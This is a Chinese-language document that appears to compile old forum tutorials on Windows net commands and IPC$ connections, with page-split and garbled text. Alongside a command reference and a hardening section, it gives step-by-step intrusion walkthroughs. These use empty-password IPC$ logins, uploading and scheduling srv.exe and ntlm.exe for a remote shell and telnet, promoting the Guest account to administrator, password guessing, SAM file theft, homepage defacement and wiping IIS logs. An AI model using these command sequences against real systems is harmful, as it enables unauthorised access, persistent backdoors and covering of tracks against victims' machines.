net 命令.docx

1、net 命令我在访问局域网的一台主机时,我把记住密码那一个小筐打上了钩，以后每次想访问那台机子都不用输入用户名和密码了,可是那台机子对访问的用户都设置了权限，不同的用户访问权限不一样，我必须要换用户名和密码才能访问那台机子另一个文件夹，我知道运行control userpasswords2/高级/管理密码可以清除,但是我要写成bat,怎样才能在dos下清除已经记住的共享密码?net use 主机名或IP 8888 /user:aaa，接着把该bat文件拖放到“开始程序启动”组中，这样一开机，系统就会以aaa为用户名，8888为密码登录你指定的主机 电脑，这样你在任何地方访问它上面的共享文件夹则

2、无需再输入用户名和密码了。 net localgroup administrators 用户名 /add 添加用户到管理组net user 用户名 查看用户的基本情况net share 查看计算机IPC$共享资源net share 共享名 查看该共享的情况net share 共享名=路径 设置共享。例如 net share c$=c:net share 共享名 /delete 删除IPC$共享net use ipipc$ 密码 /user:用户名 ipc$连接net time ip 查看远程计算机上的时间copy 路径:文件名 ip共享名 复制文件到已经ipc$连接的计算机ftp 服务器地址

3、进入FTP服务器at ip 时间 命令(注意加盘符) 在远程计算机上加一个作业一、ping 用来检查网络是否通畅或网络连接速度的命令。-t不间断向目标IP发送数据包-l自定义发送数据包的大小，默认为32字节，最高可定制为65500字节-n自定义向目标IP发送数据包的次数说明：Time=2 表示从发出数据包到接受到返回数据包所用的时间TTL=32 判断目标IP的操作系统（128，W2K；250，Unix）二、nbtstat 该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用该命令可得以远程主机的NetBIOS信息，如用户名、所属工作组、网卡的MAC地址-a使用此参数

4、需要知道远程主机的机器名称，可得到它的NetBIOS信息-A使用此参数需要知道远程主机的IP地址，可得到它的NetBIOS信息-n列出本地的NetBIOS信息三、netstat 查看网络状态的命令-a IP查看目标机器的所有开放端口，如查看本地机器开放的所有FTP服务、Telnet服务、邮件服务、WEB服务等。-r IP列出当前的路由信息，告之我们目标机器的网关、子网掩码等信息四、tracert 跟踪路由信息，使用该命令可查出数据从本地机器传输到目标主机所经过的所有途径tracert IP五、net 该命令是网络命令中最重要的一个net view IP查看远程主机的所有共享资源net use

5、IP把远程主机的某个共享资源是非曲直射为本地盘符。例：Net use Z: IPsharename表示把IP的共享名为sharename映射成本地的Z盘例：net use IPIPC$Password/user:name表示与IP建立连接net start使用该命令来启动远程主机上的服务。net stop使用该命令停止远程上机上的某个服务net user查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。 1、net user abcd 123456 /add，新建一个用户名为“abcd”密码为“123456”帐户 2、net user abcd /del，将用户

6、名为“abcd”的帐户删除 3、net user abcd /active:no，将用户名为“abcd”的帐户停用 4、net user abcd /active:yes，将用户名为“abcd”的帐户激活 5、net user abcd，查看用户名为“abcd”的帐户情况net localgroup查看所有和用户组有关的信息和进行相关操作。例：net localgroup groupname abcd /add 将普通组内帐户为“abcd”的用户提升为“administrator”组成员net time IP查看目标机器的当前时间六、at 该命令的作用是安排在特定日期或时间内执行某个特定的命令

7、或程序at time command computer表示在指定的计算机上到特定的时间内执行七、ftp FTP命令服务open IP 21表示与IP建立FTP连接，连接端口为21，连接成功将提示键入帐户和密码der 显示该目录内的文件cd 进入指定的文件夹get 下载文件到本地put 上传文件到目标机器（需要权限支持）delete 删目标机器上的某个文件（需要权限支持）bye 退出当前连接quit 退出当前连接 详细如何建立远程IPC$连接 & 怎么禁止ipc$连接 2008-03-20 10:171. 详细如何建立远程IPC$连接什么是ipc$IPC$(Internet Process Co

8、nnection)是共享命名管道的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权 限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认 共享,即所有的逻辑盘(c$,d$,e$

9、)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访 问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.解惑:1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不

10、能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表三 建立ipc$连接在hack攻击中的作用就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权 限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说

11、了吧,what u want,u can do!(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.所以我认为,你不要把ipc$入侵当作终

12、极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.四 ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后

13、就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任 何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口 实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻

14、辑盘(c$,d$,e$)和系统目录winnt或 windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五 ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因：错误号5，拒绝访问 ：很可能你使用的用户不是管理员权限的，先提升权限；错误号51，Windows 无法找到网络路径 : 网络有问题；错误号53，找

15、不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；错误号67，找不到网络名 ：你的lanmanworkstation服务未启动；目标删除了ipc$；错误号1219，提供的凭据与已存在的凭据集冲突 ：你已经和对方建立了一个ipc$，请删除再连。错误号1326，未知的用户名或错误密码 ： 原因很明显了；错误号1792，试图登录，但是网络登录服务没有启动 ：目标NetLogon服务未启动。（连接域控会出现此情况）错误号2242，此用户的密码已经过期 ：目标有帐号策略，强制定期要求更改密码。关于ipc$连不上的问题比较复杂，除了以上的原因,还

16、会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.六 如何打开目标的IPC$(此段引自相关文章)首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以 使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）, 还是不行的话（比如有防火墙，杀不了）建议放弃。七 如何防范ipc$入侵1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自解

17、剖win2000下的空会话)首先运行regedit，找到如下组建HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl LSA把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2禁止默认共享1）察看本地共享资源运行-cmd-输入net share2）删除共享(每次输入一个）net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete（如果有e

18、,f,可以继续删除）3）停止server服务net stop server /y （重新启动后server服务会重新开启）4）修改注册表运行-regeditserver版:找到如下主键HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices LanmanServerParameters把AutoShareServer（DWORD）的键值改为:00000000。pro版:找到如下主键HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices LanmanServerParameters把AutoShareWks（D

19、WORD）的键值改为:00000000。如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师5设置复杂密码，防止通过ipc$穷举密码（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创）八 相关命令1)建立空连接:net use IPipc$ /user: (一定要注意:这一行命令中包含了3个空格)2)建立

20、非空连接:net use IPipc$ 用户名 /user:密码 (同样有3个空格)3)映射默认共享:net use z: IPc$ 密码 /user:用户名 (即可将对方的c盘映射为自己的z盘，其他盘类推)如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: IPc$4)删除一个ipc$连接net use IPipc$ /del5)删除共享映射net use c: /del 删除映射的c盘，其他盘类推net use * /del 删除全部,会有提示要求按y确认九 经典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原

21、创作者!(不知道是哪位前辈)1. C:net use 127.0.0.1IPC$ /user:admintitrators这是用流光扫到的用户名是administrators，密码为空的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的 命令来与127.0.0.1建立一个连接，因为密码为空，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入 administrators，命令即可成功完成。2. C:copy srv.exe 127.0.0.1admin$先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:winntsystem

22、32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。3. C:net time 127.0.0.1查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。4. C:at 127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）5. C:net time 127.0.0.1再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。6. C:telnet 127.0.0.1 99这里会用到T

23、elnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了7.C:copy ntlm.exe 127.0.0.1admin$用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在流光的Tools目录中）。8. C:WINNTsystem32ntlm输入ntlm启动（这里的C:WINNTsystem32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出

24、现DONE的时候，就说明已经启动正常。然后使用net start telnet来开启Telnet服务！9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组10. C:net user guest /active:yes将对方的Guest用户激活11. C:net user guest 1234将Guest的密码改为1234,或者你要设定的密码12. C:net localgroup administrators guest /add将Guest变为Ad

25、ministrator_(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) 另：要建立远程IPC$连接必须具备以下条件：1、有超管的密码；2、远程机开启了Sever服务项，一般都开了，除非是高手知道多一点；3、了解以下Net Use之类的命令。先用X-scan扫一下哪些机子有ipc漏洞，或者超管密码为空的。比如得到IP 192.168.0.1.。先Ping一下，确保他在线。然后在Windows下的虚拟Dos下（即cmd)输入：net use 192.168.0.1 ipc$ 密码“ /user:adminstrator运行成功后可以通过本机的注册表或服

26、务项远程连接，在第一个下拉菜单里有该命令。远程更改服务或注册表。也可以把肉鸡的共享盘影射到本机的我的电脑。net use z:192.168.0.1c$完成后就可以在我的电脑里看到z盘符，即远程机的c盘。2. 如何入侵能建立IPC$空连接的主机IPC$的定义:IPC$是共享“命名管道”的资源，它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。 IPC$的作用:利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码)，而利用这个空的连接，我们就可以得到目标主机上的用户列表。2:这步要使用NET命令，如果你不懂的话建议你快学，NET可是非常强大的命令!(本人正在苦练

27、中)如果你不懂的话就跟着我做吧。 3:如果知道了对方的用户名和密码就用下面这个命令: net use 127.0.0.1ipc$ 密码 /user:用户名 退出的命令是: net use 127.0.0.1ipc$ /delte 相信能知道对方用户名和密码的情况不多，详细说明就不写了，写出进入和退出命令仅供大家拿朋友的机子做做试验，熟悉一下界面 4:大部分情况下我们都不知道对方机子的用户名和密码。查他IP用ping命令，格式为:ping(空格)www.XXX.com(如果用QQ聊天更 简单，现在有QQ显IP补丁，IP一目了然)， 用追捕查他的操作系统，用户名等。现在信息都有了，然后大家试试弱智

28、点的密码，如:123，12345，123456，用户名。运气好的话就可以进入 了:)你懒得作字典的话我还有一篇弱智密码集DIC，可以去看看:) 5:实在猜不出密码的话我们只有祭上榕哥的大作-流光!运行 探测-扫描POP3/FTP/NT/SQL主机，会出现“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”，这步你可以选择要扫描 的IP段，也可以只填某一IP，扫描主机类型”选择“NT/98”，然后开始扫描，有了NT/98的机器了，(如果单扫某一IP，我建议扫描主机类型选 ALL，选项选中的内容不要取消)可以看看他的机子是什么颜色的，具体表示看下表: 红色:该主机安装了FrontP

29、age扩展。并没有权限设置。如果扫到红色的，你可以打开FrontPage，在打开那里填上他的IP地址，接着你就知道怎么做了:) 蓝色:表示该主机上安装了FrontPage扩展 黑色:远程执行命令。你可以单击该主机-连接，就可以用DOS命令操作远程计算机，如:dir c: 黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件，下载后来后用LC3可以解开) 绿色:将对方SAM文件上传到指定的FTP服务器 6:现在知道了他主机的情况，可以开始探测他的用户列表了!右键点击IPC$主机-探测-探测所有IPC$用户列表，下面两个对话框的设置都选上，我 们只要IPC$管理员的弱口令。在结果点

30、击右键，探测用户列表，Administrstor(超级用户)直接探测到ADMIN的密码，如果实在不行，我们 还可以拿其他用户“开刀”，然后在想办法让他变成超级用户。 7:得到用户名和密码我们就可以连接了。打开win2000下的cmd.exe(也就是命令提示符)。然后重复第二步教过的连接连接命令: net use 127.0.0.1ipc$ 密码 /user:用户名 成功连接后显示命令成功完成。这样的话那台机子就成了“你的亲戚了”:) 8:现在你可以用copy命令把你想要上传的东西放到他的机子了:) 9:如果你想黑他页面的话找到他的网页所在的目录，如:c:inetpubwwwroot ，用命令: copy c:index.htm IP地址c$inetpubwwwroot 这里的c:index.htm指的是你作好的网页，上传替换掉原先的文件就可以改他的主页。 10:以上教的就是教你如何改别人主页。如想要进一步控制对方的主机还需很多步骤，我手累了，你还想学的话看我第二篇教程吧:) 11:大家到了这步一定要记得擦PP(记录你信息的记录)，我推荐小搈的CleanIISLog IIS，简单易用，在对